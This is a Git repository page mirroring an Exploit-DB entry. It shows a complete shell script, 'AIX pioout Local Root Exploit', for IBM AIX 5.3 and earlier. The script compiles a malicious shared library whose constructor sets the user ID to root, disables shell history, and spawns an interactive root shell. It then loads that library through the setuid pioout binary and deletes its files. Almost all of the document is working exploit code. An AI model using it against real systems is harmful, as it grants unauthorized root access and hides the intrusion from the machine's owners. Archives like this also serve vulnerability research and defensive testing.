bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/aix/local/4232.sh
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

29 lines
635 B
Bash
Executable file
Raw Blame History

#!/bin/sh
#
# 07/2007: public release
# IBM AIX <= 5.3 sp6
#
echo "-------------------------------"
echo " AIX pioout Local Root Exploit "
echo " By qaaz"
echo "-------------------------------"
cat >piolib.c <<_EOF_
#include <stdlib.h>
#include <unistd.h>
void init() __attribute__ ((constructor));
void init()
{
seteuid(0);
setuid(0);
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", (void *) 0);
execl("/bin/sh", "sh", "-i", (void *) 0);
perror("execl");
exit(1);
}
_EOF_
gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib
# milw0rm.com [2007-07-27]
Reference in a new issue View git blame Copy permalink